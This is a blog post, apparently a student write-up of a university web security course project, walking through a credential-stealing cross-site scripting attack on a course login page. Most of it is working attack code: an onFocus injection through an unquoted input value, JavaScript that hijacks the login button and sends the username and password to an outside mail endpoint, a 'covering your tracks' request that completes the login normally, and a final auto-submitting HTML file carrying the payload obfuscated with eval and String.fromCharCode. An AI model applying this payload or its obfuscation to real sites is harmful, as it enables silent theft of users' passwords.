Advertisements
Home > Information Technology, programming, Science, Security > Attack E: Password Theft

Attack E: Password Theft

The final task of this project or the “fun part” is to steal someone’s password from the website. The user will initially not logged in to the website. When an attacker creates an HTML file and send it to the user to click on it, the malicious HTML file will redirect to the website and the user will unsuspiciously type in his username and password just to get his login information sent to the attacker’s email when he press the log in button. Of course, to avoid suspicion, the login needs to acts as normal as possible if he enters a legitimate username with the matching password.

1. Study the form

I know it’s cliche, but hey that’s what you need to do first. So, let’s look at the source code of the login page just to make sure:

<div id="login">
 <form name=loginform method=POST action="
  <?php echo $_SERVER['PHP_SELF']?>">
  <table>
   <tr>
    <td>Username:</td>
    <td><input type=text name=login_username
      size=30 autocomplete=no value=<?php
      echo htmlspecialchars($_POST['login_username']); ?>></td>
   </tr>
   <tr>
    <td>Password:</td>
    <td colspan=2><input type=password name=login_password
      size=30 autocomplete=no>
      <input type=submit name=submit_login value="Log in">
      <input type=submit name=submit_registration value="Register">
    </td>
   </tr>
  </table>
 </form>
</div>
<div>
 <?php global $login_error; echo $login_error; ?>
</div>
<script>document.loginform.login_username.focus();</script>

Now, everytime the user tries to login to his account, the page will query the field and when it doesn’t found the username, the username that he has previously enter gets filtered by the htmlspecialchars() function.

<input type=text name=login_username
      size=30 autocomplete=no value=<?php
      echo htmlspecialchars($_POST['login_username']); ?>>

See anything unusual? You guess it, why do you do a filter after the form has been sent? Now, if you don’t know what htmlspecialchars() do, it basically converts ‘,”,<,> into &#039,&quot,&lt,&gt. So we need to circumvent that with something else later on. Let’s see, what else we can do that will trigger the website to do a script process without using the script tag? Ah, here’s a nice little function:

<script>document.loginform.login_username.focus();</script>

It seems the website trying to create a friendly interface by automatically set focus on the login username textfield so you don’t have to put your mouse on the login username text field to type your username. Thank you web developers!

2. Exploit the onFocus

Since we discovered that the website uses the focus() function on the login username textfield, we can use something like this as our username:

? onFocus=alert()

It’s a good thing that the value of the login username textfield is not closed by quotes so we can do this code. So, everytime the website gets the username field and retrieve it back to the page, the input tag will look something like this:

<input type=text name=login_username
      size=30 autocomplete=no value=?
      onFocus=alert()>

And since the website uses the focus() function, the content on the onFocus will be triggered and hence execute the alert() function. Note: It seems that when you execute the alert() function, it will go to an infinite loop so the website turned of the alert() function capability. However, you can still try it in your local browser to test if your code works.

3. Manipulate the login button

Now, we have to manipulate the behaviour of the login button so it will send what the user has inputted to the form to the attacker’s email. In other words, we have to modify this input tag:

<input type=submit name=submit_login value="Log in">

So, let’s start cracking!

var mainForm = document.forms[0];
var button = mainForm.elements[2];
button.type='button';
button.addEventListener('click', function() {
},true);

The explanation of this code is, you get the form that is inside the website. Since we have only one form, we just get the first order of the form. Then, we get the third element that resides in that particular form (starts from 0)  which is the submit_login button. Then, change the type of the submit_login button to “button” and add an event listener of the button so it listen to any user clicks. Now, we have successfully change our button behaviour as we desired.

4. Send the user input to the attackers email

Now, inside the event listener we have to put our code that will get the user inputs (username, password) and send it by email to the attacker’s email.

var loginForm = document.forms[0];
var loginName = loginForm.elements[0].value;
var password = loginForm.elements[1].value;
javascript:void((new Image()).src=
   ('http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?' +
   'to=someone@stud.uni-saarland.de' + '&payload='+ loginName +
   ',' + password + '&random=' + Math.random()));

Again, we retrieve the first form element and then get the first and the second element of the form which are the login name and the password. Then we execute our sendmail script to point to the attacker’s email.

5. Covering your tracks

Now, an elegant hacker needs to consider burying his marks so the victim won’t get suspicious when he enters the correct username and password but nothing happened. So, add an XMLHttpRequest to do the usual authentication process below your malicous script:

var formEncode = function(args) {
 var output = '';
 for (var name in args) {
  if (output != '') {
   output += String.fromCharCode(38)
  }
   output += encodeURIComponent(name) + '=' +
      encodeURIComponent(args[name]);
 }
 return output;
}
loginForm.elements[2].type='submit';
var pay=new XMLHttpRequest();
pay.open('POST', '/index.php');
pay.setRequestHeader('Content-Type',
    'application/x-www-form-urlencoded');
pay.send(formEncode({login_username: loginName,
    password: password, submit_login: 'Log in'}));
window.location = "/index.php";

This function is pretty much the same as of Attack D‘s XMLHttpRequest(). It basically do an auto submit form from index.php by setting the variable to what have the user inputted. Now, you will get a seemingly ordinary login form, unless the user opens the source page of the website.

6. Putting it all together

Now, you would say, how the hack would I fit those code into one continous sentence in the onFocus value? If you had read Attack D: Profile Worm, then you would have guessed that we will be using eval() and String.fromCharCode() functions. So far, you have this code:

var mainForm = document.forms[0];
var button = mainForm.elements[2];
button.type='button';
button.addEventListener('click', function() {
var loginForm = document.forms[0];
var loginName = loginForm.elements[0].value;
var password = loginForm.elements[1].value;
javascript:void((new Image()).src=
  ('http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?' +
  'to=s9sowind@stud.uni-saarland.de' + '&payload='+ loginName +
  ',' + password + '&random=' + Math.random()));
var formEncode = function(args) {
 var output = '';
 for (var name in args) {
  if (output != '') {
   output += String.fromCharCode(38)
  }
 output += encodeURIComponent(name) +
   '=' + encodeURIComponent(args[name]);
 }
 return output;
}
loginForm.elements[2].type='submit';
var pay=new XMLHttpRequest();
pay.open('POST', '/index.php');
pay.setRequestHeader('Content-Type',
  'application/x-www-form-urlencoded');
pay.send(formEncode({login_username: loginName,
  password: password, submit_login: 'Log in'}));
window.location = "/index.php";
},true);

Now, your next job is to find a good ASCII to Unicode converter website to convert all your code. The final touch is to construct an HTML file which will submit the code beforehand and asks the user the type his username and password:

<!DOCTYPE html>
<html>
 <head>
 </head>
 <body onLoad = "breakthrough()">
  <form name=loginform method=POST action="/index.php">
   <input type=hidden name=login_username size=30 autocomplete=no
      value="? onFocus=eval(String.fromCharCode(118,97,114,32,109,
      97,105,110,70,111,114,109,32,61,32,100,111,99,117,109,101,110,
      116,46,102,111,114,109,115,91,48,93,59,10,118,97,114,32,98,117,
      116,116,111,110,32,61,32,109,97,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,50,93,59,10,98,117,116,116,111,
      110,46,116,121,112,101,61,39,98,117,116,116,111,110,39,59,10,98,
      117,116,116,111,110,46,97,100,100,69,118,101,110,116,76,105,115,
      116,101,110,101,114,40,39,99,108,105,99,107,39,44,32,102,117,110,
      99,116,105,111,110,40,41,32,123,10,118,97,114,32,108,111,103,105,
      110,70,111,114,109,32,61,32,100,111,99,117,109,101,110,116,46,102,
      111,114,109,115,91,48,93,59,10,118,97,114,32,108,111,103,105,110,
      78,97,109,101,32,61,32,108,111,103,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,48,93,46,118,97,108,117,101,59,10,
      118,97,114,32,112,97,115,115,119,111,114,100,32,61,32,108,111,103,
      105,110,70,111,114,109,46,101,108,101,109,101,110,116,115,91,49,93,
      46,118,97,108,117,101,59,10,106,97,118,97,115,99,114,105,112,116,58,
      118,111,105,100,40,40,110,101,119,32,73,109,97,103,101,40,41,41,46,
      115,114,99,61,40,39,104,116,116,112,58,47,47,109,97,105,108,45,
      105,110,102,115,101,99,46,99,115,46,117,110,105,45,115,97,97,114,
      108,97,110,100,46,100,101,58,56,48,48,48,47,115,101,110,100,109,
      97,105,108,46,112,104,112,63,39,32,43,32,39,116,111,61,115,57,115,
      111,119,105,110,100,64,115,116,117,100,46,117,110,105,45,115,97,97,
      114,108,97,110,100,46,100,101,39,32,43,32,39,38,112,97,121,108,111,
      97,100,61,39,43,32,108,111,103,105,110,78,97,109,101,32,43,32,39,44,
      39,32,43,32,112,97,115,115,119,111,114,100,32,43,32,39,38,114,97,110,
      100,111,109,61,39,32,43,32,77,97,116,104,46,114,97,110,100,111,109,40,41,
      41,41,59,10,118,97,114,32,102,111,114,109,69,110,99,111,100,101,32,61,
      32,102,117,110,99,116,105,111,110,40,97,114,103,115,41,32,123,10,118,97,
      114,32,111,117,116,112,117,116,32,61,32,39,39,59,10,102,111,114,32,40,118,
      97,114,32,110,97,109,101,32,105,110,32,97,114,103,115,41,32,123,10,105,
      102,32,40,111,117,116,112,117,116,32,33,61,32,39,39,41,32,123,32,111,117,
      116,112,117,116,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,
      104,97,114,67,111,100,101,40,51,56,41,32,125,10,111,117,116,112,117,116,32,
      43,61,32,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,
      116,40,110,97,109,101,41,32,43,32,39,61,39,32,43,32,101,110,99,111,100,
      101,85,82,73,67,111,109,112,111,110,101,110,116,40,97,114,103,115,91,
      110,97,109,101,93,41,59,10,125,10,114,101,116,117,114,110,32,111,117,
      116,112,117,116,59,10,125,10,108,111,103,105,110,70,111,114,109,46,101,
      108,101,109,101,110,116,115,91,50,93,46,116,121,112,101,61,39,115,
      117,98,109,105,116,39,59,10,118,97,114,32,112,97,121,61,110,101,119,
      32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,112,
      97,121,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,
      112,58,47,47,119,119,119,46,105,110,102,115,101,99,46,99,115,46,
      117,110,105,45,115,97,97,114,108,97,110,100,46,100,101,47,116,101,97,
      99,104,105,110,103,47,49,48,87,83,47,83,101,99,117,114,105,116,121,
      47,109,97,116,101,114,105,97,108,47,112,114,111,106,101,99,116,115,47,
      112,114,111,106,101,99,116,50,47,112,101,97,110,117,116,47,105,110,
      100,101,120,46,112,104,112,39,41,59,10,112,97,121,46,115,101,116,82,
      101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,
      101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,
      116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,
      108,101,110,99,111,100,101,100,39,41,59,10,112,97,121,46,115,101,110,
      100,40,102,111,114,109,69,110,99,111,100,101,40,123,108,111,103,105,
      110,95,117,115,101,114,110,97,109,101,58,32,108,111,103,105,110,78,97,
      109,101,44,32,112,97,115,115,119,111,114,100,58,32,112,97,115,115,
      119,111,114,100,44,32,115,117,98,109,105,116,95,108,111,103,105,110,
      58,32,39,76,111,103,32,105,110,39,125,41,41,59,10,119,105,110,100,111,
      119,46,108,111,99,97,116,105,111,110,32,61,32,34,104,116,116,
      112,58,47,47,119,119,119,46,105,110,102,115,101,99,46,99,115,
      46,117,110,105,45,115,97,97,114,108,97,110,100,46,100,101,47,
      116,101,97,99,104,105,110,103,47,49,48,87,83,47,83,101,99,
      117,114,105,116,121,47,109,97,116,101,114,105,97,108,47,112,
      114,111,106,101,99,116,115,47,112,114,111,106,101,99,116,50,47,
      112,101,97,110,117,116,47,105,110,100,101,120,46,112,104,
      112,34,59,10,125,44,116,114,117,101,41,59))">
   <script type="text/javascript">
    function breakthrough() {
     document.loginform.submit();
    }
   </script>
  </form>
 </body>
</html>
Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: